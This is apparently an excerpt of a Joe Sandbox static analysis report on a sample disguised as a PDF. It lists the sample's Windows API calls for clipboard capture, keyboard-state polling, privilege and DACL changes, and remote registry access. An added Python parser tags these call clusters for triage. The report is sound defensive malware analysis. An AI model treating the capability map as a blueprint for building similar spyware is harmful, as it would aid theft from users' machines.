• Instruction Fuzzy Hash: 7E317571A81318BBEB306FA19C49F7E3F7CEB44B50F158066FA06E61D0C6B45D10ABA5
APIs
  • Part of subcall function 007A8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007A8D0D
  • Part of subcall function 007A8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007A8D3A
  • Part of subcall function 007A8CC3: GetLastError.KERNEL32 ref: 007A8D47
• _memset.LIBCMT ref: 007A889B
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 007A88ED
• CloseHandle.KERNEL32(?), ref: 007A88FE
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 007A8915
• GetProcessWindowStation.USER32 ref: 007A892E
• SetProcessWindowStation.USER32(00000000), ref: 007A8938
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 007A8952
  • Part of subcall function 007A8713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007A8851), ref: 007A8728
  • Part of subcall function 007A8713: CloseHandle.KERNEL32(?,?,007A8851), ref: 007A873A
Strings
Similarity
• API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
• String ID: $default$winsta0
• API String ID: 2063423040-1027155976
• Opcode ID: 577c37cbb0ffcda892205533cc9e05b9e70a2d022b87905cdba06a7d313856ec
• Instruction ID: 4ef5a74cbb2cc8fbffe266477cb831af0fe22809a886aced338bcc874b8522eb
• Opcode Fuzzy Hash: 577c37cbb0ffcda892205533cc9e05b9e70a2d022b87905cdba06a7d313856ec
• Instruction Fuzzy Hash: 4A818D71901209EFDF51DFA4CC49AEE7BB8FF45304F08826AF911A6261DB398E14DB61
APIs
• OpenClipboard.USER32(007DF910), ref: 007C4284
• IsClipboardFormatAvailable.USER32(0000000D), ref: 007C4292
• GetClipboardData.USER32(0000000D), ref: 007C429A
• CloseClipboard.USER32 ref: 007C42A6
• GlobalLock.KERNEL32(00000000), ref: 007C42C2
• CloseClipboard.USER32 ref: 007C42CC
• GlobalUnlock.KERNEL32(00000000), ref: 007C42E1
• IsClipboardFormatAvailable.USER32(00000001), ref: 007C42EE
• GetClipboardData.USER32(00000001), ref: 007C42F6
• GlobalLock.KERNEL32(00000000), ref: 007C4303
• GlobalUnlock.KERNEL32(00000000), ref: 007C4337
• CloseClipboard.USER32 ref: 007C4447
Similarity
• API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
• String ID:
• API String ID: 3222323430-0
• Opcode ID: dc00600e37ec9fe92f46fe34cf3dba2491c2332f3654fd8791259f8ca78cfc9a
• Instruction ID: 114aca2aaa43bd58afc2031bccd98958a78d3bc94bc9154faeacb61435369e2f
• Opcode Fuzzy Hash: dc00600e37ec9fe92f46fe34cf3dba2491c2332f3654fd8791259f8ca78cfc9a
• Instruction Fuzzy Hash: 4D51B271204301ABD311EF60EC9AFAE77B8BF84B01F14852EF956D21A1DB78D904CB66
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 007BC9F8
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 007BCA4C
                                                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007BCA71
                                                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007BCA88
                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 007BCAAF
                                                                                                                      • __swprintf.LIBCMT ref: 007BCAFB
                                                                                                                      • __swprintf.LIBCMT ref: 007BCB3E
                                                                                                                        • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
                                                                                                                      • __swprintf.LIBCMT ref: 007BCB92
                                                                                                                        • Part of subcall function 007738D8: __woutput_l.LIBCMT ref: 00773931
                                                                                                                      • __swprintf.LIBCMT ref: 007BCBE0
                                                                                                                        • Part of subcall function 007738D8: __flsbuf.LIBCMT ref: 00773953
                                                                                                                        • Part of subcall function 007738D8: __flsbuf.LIBCMT ref: 0077396B
                                                                                                                      • __swprintf.LIBCMT ref: 007BCC2F
                                                                                                                      • __swprintf.LIBCMT ref: 007BCC7E
                                                                                                                      • __swprintf.LIBCMT ref: 007BCCCD
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                                                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                      • API String ID: 3953360268-2428617273
                                                                                                                      • Opcode ID: 6e4baafe0490bac23245cca8f01fd4c5fb2d47221ba8e162f20d92d515f0bfbb
                                                                                                                      • Instruction ID: c12a9c253c5cd44459cf25ca6a9a1ef6119a1d5c5f2eaf24b57a5583737b0221
                                                                                                                      • Opcode Fuzzy Hash: 6e4baafe0490bac23245cca8f01fd4c5fb2d47221ba8e162f20d92d515f0bfbb
                                                                                                                      • Instruction Fuzzy Hash: 7EA12EB1518305EBC704EB64C88ADEFB7ECBF94701F408919F986D6191EB78DA09C762
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 007BF221
                                                                                                                      • _wcscmp.LIBCMT ref: 007BF236
                                                                                                                      • _wcscmp.LIBCMT ref: 007BF24D
                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 007BF25F
                                                                                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 007BF279
                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 007BF291
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 007BF29C
                                                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 007BF2B8
                                                                                                                      • _wcscmp.LIBCMT ref: 007BF2DF
                                                                                                                      • _wcscmp.LIBCMT ref: 007BF2F6
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 007BF308
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(0080A5A0), ref: 007BF326
                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 007BF330
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 007BF33D
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 007BF34F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                      • String ID: *.*
                                                                                                                      • API String ID: 1803514871-438819550
                                                                                                                      • Opcode ID: cb4a15613ecd241f3cacfa7a9742c34eaffa90ddebd797e4a4e82004408e8437
                                                                                                                      • Instruction ID: bedfa6d8b89dadff880406af8cc15feaeb7c35ead23c421fef8673ee93c79950
                                                                                                                      • Opcode Fuzzy Hash: cb4a15613ecd241f3cacfa7a9742c34eaffa90ddebd797e4a4e82004408e8437
                                                                                                                      • Instruction Fuzzy Hash: 5331F376501209AADF14DBB4DC89BDE73FCBF08760F148176E815E31A0EB38DA44CA64
                                                                                                                      APIs
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007D0BDE
                                                                                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,007DF910,00000000,?,00000000,?,?), ref: 007D0C4C
                                                                                                                      • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 007D0C94
                                                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 007D0D1D
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 007D103D
                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 007D104A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Close$ConnectCreateRegistryValue
                                                                                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                      • API String ID: 536824911-966354055
                                                                                                                      • Opcode ID: e2dd1de62132fff332934be65f5bae2762b3dfefb05f464109d72a9ba8b19d4c
                                                                                                                      • Instruction ID: d16ec6e96ee5a3572154d7dfa45a486584526b044b73d531a8de750855417160
                                                                                                                      • Opcode Fuzzy Hash: e2dd1de62132fff332934be65f5bae2762b3dfefb05f464109d72a9ba8b19d4c
                                                                                                                      • Instruction Fuzzy Hash: 94024875200601DFCB14EF24C895A6AB7F5EF88714F04885EF98A9B362CB78ED45CB91
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 007BF37E
                                                                                                                      • _wcscmp.LIBCMT ref: 007BF393
                                                                                                                      • _wcscmp.LIBCMT ref: 007BF3AA
                                                                                                                        • Part of subcall function 007B45C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 007B45DC
                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 007BF3D9
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 007BF3E4
                                                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 007BF400
                                                                                                                      • _wcscmp.LIBCMT ref: 007BF427
                                                                                                                      • _wcscmp.LIBCMT ref: 007BF43E
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 007BF450
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(0080A5A0), ref: 007BF46E
                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 007BF478
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 007BF485
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 007BF497
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                      • String ID: *.*
                                                                                                                      • API String ID: 1824444939-438819550
                                                                                                                      • Opcode ID: 608cdff08954e6f50a469e5f3cf924b781b58099439c3f16c69dcc61cbb457b5
                                                                                                                      • Instruction ID: ba5c64bed86c27e752d6899d54b29182415d9ea71df283b5791404d887244343
                                                                                                                      • Opcode Fuzzy Hash: 608cdff08954e6f50a469e5f3cf924b781b58099439c3f16c69dcc61cbb457b5
                                                                                                                      • Instruction Fuzzy Hash: 3031E5715012596FDF149BA4EC88BDE77ACAF09760F148276E854E31A0DB3CDA44CA64
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 007A874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 007A8766
                                                                                                                        • Part of subcall function 007A874A: GetLastError.KERNEL32(?,007A822A,?,?,?), ref: 007A8770
                                                                                                                        • Part of subcall function 007A874A: GetProcessHeap.KERNEL32(00000008,?,?,007A822A,?,?,?), ref: 007A877F
                                                                                                                        • Part of subcall function 007A874A: HeapAlloc.KERNEL32(00000000,?,007A822A,?,?,?), ref: 007A8786
                                                                                                                        • Part of subcall function 007A874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 007A879D
                                                                                                                        • Part of subcall function 007A87E7: GetProcessHeap.KERNEL32(00000008,007A8240,00000000,00000000,?,007A8240,?), ref: 007A87F3
                                                                                                                        • Part of subcall function 007A87E7: HeapAlloc.KERNEL32(00000000,?,007A8240,?), ref: 007A87FA
                                                                                                                        • Part of subcall function 007A87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,007A8240,?), ref: 007A880B
                                                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 007A825B
                                                                                                                      • _memset.LIBCMT ref: 007A8270
                                                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 007A828F
                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 007A82A0
                                                                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 007A82DD
                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 007A82F9
                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 007A8316
                                                                                                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 007A8325
                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 007A832C
                                                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 007A834D
                                                                                                                      • CopySid.ADVAPI32(00000000), ref: 007A8354
                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 007A8385
                                                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 007A83AB
                                                                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 007A83BF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3996160137-0
                                                                                                                      • Opcode ID: 9f332db6a8668143979ca09f3ed3ef54ad8eea8f23b43d467c05a3b563016255
                                                                                                                      • Instruction ID: a24579a785ad46233dfae87b5732f899dcbd4aec624e616479bf82758ddf6b4c
                                                                                                                      • Opcode Fuzzy Hash: 9f332db6a8668143979ca09f3ed3ef54ad8eea8f23b43d467c05a3b563016255
                                                                                                                      • Instruction Fuzzy Hash: E2614D71900209EFDF00DF95DC48AEEBBB9FF45700F14826AF816A7291DB399A05CB61
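Reading these function blocks by API cluster is how a triager turns the IDA-plugin listing into capabilities: the FindFirstFileW/FindNextFileW/SetCurrentDirectoryW loops above, with the `*.*` pattern, walk a directory tree (one variant also calls SetFileAttributesW); the RegConnectRegistryW/RegCreateKeyExW/RegSetValueExW block, with its REG_* type-name strings, writes registry values and, because of RegConnectRegistryW, can target a remote machine's hive as well as the local one; and the GetUserObjectSecurity/GetSecurityDescriptorDacl/AddAce/SetSecurityDescriptorDacl/SetUserObjectSecurity sequence appends an ACE to the DACL of a window station or desktop, the only object types those two USER32 calls accept. Whether any of these paths is actually reached at runtime is a question for the dynamic sections of the report, not this static listing. The script below is an added example, not Joe Sandbox's code and not anything recovered from the sample: it parses blocks in the text format shown on this page and tags each one from its direct API calls. The RULES table and its tag names are assumptions for illustration, and the sample input is a shortened excerpt constructed from the blocks above.

```python
# Parser for the Joe Sandbox IDA-plugin function blocks shown on this page.
# Added example, not Joe Sandbox's code; RULES and its tag names are assumed.
import re
from collections import namedtuple

ApiCall = namedtuple("ApiCall", "name module args ref subcall")

# "• Name.MODULE(args), ref: ADDR"; subcall rows carry the parent address.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)$"
)
# "• Key: value" metadata rows (Source File, Associated, String ID, ...).
FIELD_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")

# Assumed rule table, not a Joe Sandbox signature set. A tag fires only when
# every listed API is a DIRECT call of the block, so a shared helper listed
# as "Part of subcall" does not tag all of its callers.
RULES = {
    "registry-write": {"RegCreateKeyExW", "RegSetValueExW"},
    "winsta-desktop-dacl-edit": {"GetSecurityDescriptorDacl", "AddAce", "SetUserObjectSecurity"},
    "recursive-dir-walk": {"FindFirstFileW", "FindNextFileW", "SetCurrentDirectoryW"},
    "file-attrib-change": {"SetFileAttributesW"},
}


def new_block():
    return {"calls": [], "strings": [], "meta": {}}


def parse_blocks(text):
    """Split report text into blocks; a block ends at its 'Instruction Fuzzy
    Hash' row, and a truncated final block is kept with what it has."""
    blocks, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        cur = cur or new_block()
        m = API_RE.match(line)
        if m:
            args = [a for a in (m["args"] or "").split(",") if a]
            cur["calls"].append(ApiCall(m["name"], m["mod"], args, m["ref"], m["sub"]))
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue  # headings such as 'APIs', 'Strings', 'Similarity'
        key, val = m["key"], m["val"].strip()
        if val.endswith("Download File"):  # link text fused onto the value
            val = val[:-len("Download File")]
        if key == "String ID":
            # Joe Sandbox joins strings with '$'; a literal '$' is ambiguous.
            cur["strings"] = [s for s in val.split("$") if s]
        else:
            cur["meta"][key] = val
        if key == "Instruction Fuzzy Hash":
            blocks.append(cur)
            cur = None
    if cur and (cur["calls"] or cur["meta"]):
        blocks.append(cur)
    return blocks


def tag_block(block):
    direct = {c.name for c in block["calls"] if c.subcall is None}
    return sorted(tag for tag, need in RULES.items() if need <= direct)


def summarize(text):
    """[(first direct call address, tags, strings)] per block, for triage notes."""
    return [(next((c.ref for c in b["calls"] if c.subcall is None), None),
             tag_block(b), b["strings"]) for b in parse_blocks(text)]


# Constructed excerpt: three blocks from this report, shortened; the third is
# cut before its 'Instruction Fuzzy Hash' row on purpose.
SAMPLE = """
APIs
• FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 007BF221
• SetFileAttributesW.KERNEL32(?,?), ref: 007BF279
• FindNextFileW.KERNEL32(00000000,?), ref: 007BF291
• FindFirstFileW.KERNEL32(*.*,?), ref: 007BF2B8
• SetCurrentDirectoryW.KERNEL32(0080A5A0), ref: 007BF326
• FindClose.KERNEL32(00000000), ref: 007BF34F
Similarity
• String ID: *.*
• Instruction Fuzzy Hash: 5331F376501209AADF14DBB4DC89BDE73FCBF08760F148176E815E31A0EB38DA44CA64
APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007D0BDE
• RegCreateKeyExW.ADVAPI32(?,?,00000000,007DF910,00000000,?,00000000,?,?), ref: 007D0C4C
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 007D0D1D
• RegCloseKey.ADVAPI32(00000000), ref: 007D104A
• String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
• Instruction Fuzzy Hash: 94024875200601DFCB14EF24C895A6AB7F5EF88714F04885EF98A9B362CB78ED45CB91
APIs
  • Part of subcall function 007A874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 007A8766
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 007A825B
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 007A82F9
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 007A83AB
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 007A83BF
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
"""
```

Run `summarize(SAMPLE)` (or paste a whole function-block section in place of SAMPLE) to get one tuple per block: the address of its first direct call, its tags, and its recovered strings. Subcall rows are kept in `calls` but deliberately excluded from matching, so a shared helper such as the GetUserObjectSecurity reader at 007A874A does not tag every function that calls it; extend RULES with the clusters that matter for the case at hand.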
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$Oav$UCP)$UTF)$UTF16)$rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
                                                                                                                      • API String ID: 0-3342537335
                                                                                                                      • Opcode ID: 9668e0c512b1f8ca69f7d1f934e84e47c2a311a84eb2a5821f08ac5a6ae2e105
                                                                                                                      • Instruction ID: 6b85dce20f8c0e13b3615d2f5b31015495863c510e450e32544b9a2b928d6861
                                                                                                                      • Opcode Fuzzy Hash: 9668e0c512b1f8ca69f7d1f934e84e47c2a311a84eb2a5821f08ac5a6ae2e105
                                                                                                                      • Instruction Fuzzy Hash: 46727175E00219DBDF14CF59C8807AEB7B5FF89710F54816AE94AEB280EB789D41CB90
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 007D10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007D0038,?,?), ref: 007D10BC
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007D0737
                                                                                                                        • Part of subcall function 00759997: __itow.LIBCMT ref: 007599C2
                                                                                                                        • Part of subcall function 00759997: __swprintf.LIBCMT ref: 00759A0C
                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 007D07D6
                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 007D086E
                                                                                                                      • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 007D0AAD
                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 007D0ABA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1240663315-0
                                                                                                                      • Opcode ID: d091c9cdb9621637b42af85db0c9be87fb2323760f64b1e22c11f7e18dd8486c
                                                                                                                      • Instruction ID: 7bc0f76b90e8fc8086d3b1e1311e765fcdeb7b4b8a253b2f38a04a395f0fcb18
                                                                                                                      • Opcode Fuzzy Hash: d091c9cdb9621637b42af85db0c9be87fb2323760f64b1e22c11f7e18dd8486c
                                                                                                                      • Instruction Fuzzy Hash: 1CE11B75604210EFCB14DF24C895E6ABBF8EF89714F04C56EF84ADB262DA34E905CB91
                                                                                                                      APIs
                                                                                                                      • GetKeyboardState.USER32(?), ref: 007B0241
                                                                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 007B02C2
                                                                                                                      • GetKeyState.USER32(000000A0), ref: 007B02DD
                                                                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 007B02F7
                                                                                                                      • GetKeyState.USER32(000000A1), ref: 007B030C
                                                                                                                      • GetAsyncKeyState.USER32(00000011), ref: 007B0324
                                                                                                                      • GetKeyState.USER32(00000011), ref: 007B0336
                                                                                                                      • GetAsyncKeyState.USER32(00000012), ref: 007B034E
                                                                                                                      • GetKeyState.USER32(00000012), ref: 007B0360
                                                                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 007B0378
                                                                                                                      • GetKeyState.USER32(0000005B), ref: 007B038A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: State$Async$Keyboard
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 541375521-0
                                                                                                                      • Opcode ID: ab267d40ef5fea27c3ea38cdb65fc34caa4210e91166f0a5d323939c7c417240
                                                                                                                      • Instruction ID: ad2b822a5be2c5844b4404e420c5d91e7792a6295627bd9edafb78a32b279b1c
                                                                                                                      • Opcode Fuzzy Hash: ab267d40ef5fea27c3ea38cdb65fc34caa4210e91166f0a5d323939c7c417240
